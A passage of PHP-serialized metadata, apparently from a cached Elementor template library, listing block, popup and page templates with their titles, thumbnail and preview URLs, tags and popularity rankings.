9\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_8.png\";s:12:\"tmpl_created\";i:1520443497;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/clients-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:243;s:11:\"trend_index\";i:333;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:414;a:14:{s:2:\"id\";i:5381;s:5:\"title\";s:10:\"Clients 16\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_9.png\";s:12:\"tmpl_created\";i:1520443499;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-16/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:187;s:11:\"trend_index\";i:205;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:415;a:14:{s:2:\"id\";i:5389;s:5:\"title\";s:10:\"Clients 14\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_9.png\";s:12:\"tmpl_created\";i:1520443501;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/clients-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"clients\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:384;s:11:\"trend_index\";i:540;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:416;a:14:{s:2:\"id\";i:9944;s:5:\"title\";s:33:\"Slide In | Promotion | Headphones\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_head_small.png\";s:12:\"tmpl_created\";i:1547841939;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/slide-in-promotion-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:672;s:11:\"trend_index\";i:671;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:417;a:14:{s:2:\"id\";i:5397;s:5:\"title\";s:8:\"About 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1.png\";s:12:\"tmpl_created\";i:1520443503;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:156;s:11:\"trend_index\";i:162;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:418;a:14:{s:2:\"id\";i:9955;s:5:\"title\";s:14:\"Fly In | Login\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2019/01/flyin_login_lock_small.png\";s:12:\"tmpl_created\";i:1547842065;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/popups/fly-in-login/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:525;s:11:\"trend_index\";i:507;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:419;a:14:{s:2:\"id\";i:5405;s:5:\"title\";s:8:\"About 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1.png\";s:12:\"tmpl_created\";i:1520443505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:224;s:11:\"trend_index\";i:194;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:420;a:14:{s:2:\"id\";i:9965;s:5:\"title\";s:30:\"Classic | Register | Subscribe\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_moon_small.png\";s:12:\"tmpl_created\";i:1547842174;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:534;s:11:\"trend_index\";i:573;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:421;a:14:{s:2:\"id\";i:5413;s:5:\"title\";s:8:\"About 21\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2.png\";s:12:\"tmpl_created\";i:1520443507;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-21/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:94;s:11:\"trend_index\";i:41;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:422;a:14:{s:2:\"id\";i:14058;s:5:\"title\";s:36:\"Japanese restaurant &#8211; 404 page\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/06/404-Page.jpg\";s:12:\"tmpl_created\";i:1592290211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/japanese-restaurant-404-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:38:\"[\"404\",\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:714;s:11:\"trend_index\";i:634;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:423;a:14:{s:2:\"id\";i:5421;s:5:\"title\";s:8:\"About 13\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_3.png\";s:12:\"tmpl_created\";i:1520443509;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:226;s:11:\"trend_index\";i:253;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:424;a:14:{s:2:\"id\";i:14050;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1592290247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/japanese-restaurant-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:41:\"[\"Food\",\"footer\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:579;s:11:\"trend_index\";i:143;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:425;a:14:{s:2:\"id\";i:5429;s:5:\"title\";s:8:\"About 16\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_4.png\";s:12:\"tmpl_created\";i:1520443510;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-16/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:75;s:11:\"trend_index\";i:42;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:426;a:14:{s:2:\"id\";i:9995;s:5:\"title\";s:27:\"Slide In | Sale | Christmas\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_christmas_small.png\";s:12:\"tmpl_created\";i:1547844802;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/slide-in-sale-christmas/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:702;s:11:\"trend_index\";i:699;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:427;a:14:{s:2:\"id\";i:14042;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Header\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2020/06/japanese-restaurant-header.jpg\";s:12:\"tmpl_created\";i:1592290277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/japanese-restaurant-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:41:\"[\"Food\",\"header\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:597;s:11:\"trend_index\";i:284;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:428;a:14:{s:2:\"id\";i:5438;s:5:\"title\";s:7:\"About 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_4.png\";s:12:\"tmpl_created\";i:1520443512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:184;s:11:\"trend_index\";i:150;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:429;a:14:{s:2:\"id\";i:5447;s:5:\"title\";s:7:\"About 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_5.png\";s:12:\"tmpl_created\";i:1520443514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-3-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:54;s:11:\"trend_index\";i:33;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:430;a:14:{s:2:\"id\";i:10016;s:5:\"title\";s:16:\"Hello Bar | Sale\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2019/01/Hello-Bar_Promotion_bag_small.png\";s:12:\"tmpl_created\";i:1547845062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/hello-bar-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:712;s:11:\"trend_index\";i:0;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:431;a:14:{s:2:\"id\";i:14067;s:5:\"title\";s:37:\"Slide In | Japanese restaurant | Menu\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Menu-Pop-Up-Small.jpg\";s:12:\"tmpl_created\";i:1592290352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-japanese-restaurant-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:678;s:11:\"trend_index\";i:471;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:432;a:14:{s:2:\"id\";i:5455;s:5:\"title\";s:8:\"About 20\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_6.png\";s:12:\"tmpl_created\";i:1520443516;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-20/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:136;s:11:\"trend_index\";i:169;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:433;a:14:{s:2:\"id\";i:10026;s:5:\"title\";s:46:\"Classic | Register | Subscribe | Gym | Fitness\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_register_small.png\";s:12:\"tmpl_created\";i:1547845205;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-register-subscribe-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:553;s:11:\"trend_index\";i:558;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:434;a:14:{s:2:\"id\";i:5464;s:5:\"title\";s:8:\"About 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_6.png\";s:12:\"tmpl_created\";i:1520443518;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:227;s:11:\"trend_index\";i:252;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:435;a:14:{s:2:\"id\";i:10036;s:5:\"title\";s:43:\"Full Screen | Sale | Promotion | Headphones\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/full_sale_head_small.png\";s:12:\"tmpl_created\";i:1547845409;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/full-screen-sale-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:566;s:11:\"trend_index\";i:655;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:436;a:14:{s:2:\"id\";i:14111;s:5:\"title\";s:36:\"Classic | Japanese restaurant | Sale\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1592300400;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-japanese-restaurant-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:711;s:11:\"trend_index\";i:569;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:437;a:14:{s:2:\"id\";i:5472;s:5:\"title\";s:7:\"About 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_7.png\";s:12:\"tmpl_created\";i:1520443520;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:210;s:11:\"trend_index\";i:245;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:438;a:14:{s:2:\"id\";i:5480;s:5:\"title\";s:7:\"About 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_7-1.png\";s:12:\"tmpl_created\";i:1520443522;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-4-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:415;s:11:\"trend_index\";i:484;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:439;a:14:{s:2:\"id\";i:10057;s:5:\"title\";s:48:\"Hello Bar | Register | Subscribe | Gym | Fitness\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2019/01/hello-bar_register_sport_small.png\";s:12:\"tmpl_created\";i:1547847938;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/hello-bar-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:684;s:11:\"trend_index\";i:697;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:440;a:14:{s:2:\"id\";i:5488;s:5:\"title\";s:7:\"About 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_8.png\";s:12:\"tmpl_created\";i:1520443524;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:310;s:11:\"trend_index\";i:438;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:441;a:14:{s:2:\"id\";i:5496;s:5:\"title\";s:7:\"About 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_8-1.png\";s:12:\"tmpl_created\";i:1520443526;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:500;s:11:\"trend_index\";i:619;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:442;a:14:{s:2:\"id\";i:5504;s:5:\"title\";s:8:\"About 18\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_9.png\";s:12:\"tmpl_created\";i:1520443528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-18/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:111;s:11:\"trend_index\";i:141;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:443;a:14:{s:2:\"id\";i:10087;s:5:\"title\";s:25:\"Full Screen | Login | Spa\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2019/01/full-screen_login_spa_small.png\";s:12:\"tmpl_created\";i:1547848301;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/full-screen-login-spa/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:587;s:11:\"trend_index\";i:559;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:444;a:14:{s:2:\"id\";i:14772;s:5:\"title\";s:35:\"Luxury Real Estate &#8211; 404 page\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/07/404.png\";s:12:\"tmpl_created\";i:1595315728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/luxury-real-estate-404-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:716;s:11:\"trend_index\";i:504;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:445;a:14:{s:2:\"id\";i:5515;s:5:\"title\";s:8:\"About 19\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_9.png\";s:12:\"tmpl_created\";i:1520443530;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-19/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:273;s:11:\"trend_index\";i:475;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:446;a:14:{s:2:\"id\";i:10097;s:5:\"title\";s:37:\"Classic | Register | Subscribe | Lego\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_lego_small.png\";s:12:\"tmpl_created\";i:1547848411;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/classic-register-subscribe-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:623;s:11:\"trend_index\";i:0;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:447;a:14:{s:2:\"id\";i:14779;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Footer.png\";s:12:\"tmpl_created\";i:1595315743;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/luxury-real-estate-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"footer\",\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:708;s:11:\"trend_index\";i:251;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:448;a:14:{s:2:\"id\";i:1190;s:5:\"title\";s:26:\"Landing Page &#8211; Hotel\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp2-l.png\";s:12:\"tmpl_created\";i:1490707391;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/landing-page-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:3;s:11:\"trend_index\";i:1;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:449;a:14:{s:2:\"id\";i:9816;s:5:\"title\";s:30:\"Classic | Sale | Gym | Fitness\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2019/01/classic_sale_sport_small.png\";s:12:\"tmpl_created\";i:1547991876;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:640;s:11:\"trend_index\";i:681;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:450;a:14:{s:2:\"id\";i:9602;s:5:\"title\";s:35:\"Bottom Bar | Announcement | Cookies\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2019/01/Bottombar_Announcement_small_01.png\";s:12:\"tmpl_created\";i:1546964559;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/bottom-bar-announcement-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:560;s:11:\"trend_index\";i:526;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:451;a:14:{s:2:\"id\";i:225;s:5:\"title\";s:27:\"Homepage &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0016.png\";s:12:\"tmpl_created\";i:1470829872;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/homepage-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Homepage\",\"Restaurant\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:1;s:11:\"trend_index\";i:2;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:452;a:14:{s:2:\"id\";i:463;s:5:\"title\";s:22:\"Homepage &#8211; Study\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0022.png\";s:12:\"tmpl_created\";i:1477388340;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/homepage-study/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Education\",\"Homepage\",\"Study\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:5;s:11:\"trend_index\";i:3;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:453;a:14:{s:2:\"id\";i:10277;s:5:\"title\";s:36:\"Bottom Bar | Promotion | Sale | Book\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/book_small.png\";s:12:\"tmpl_created\";i:1548055999;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/bottom-bar-promotion-book/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:655;s:11:\"trend_index\";i:701;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:454;a:14:{s:2:\"id\";i:11241;s:5:\"title\";s:36:\"Classic | Digital Agency | 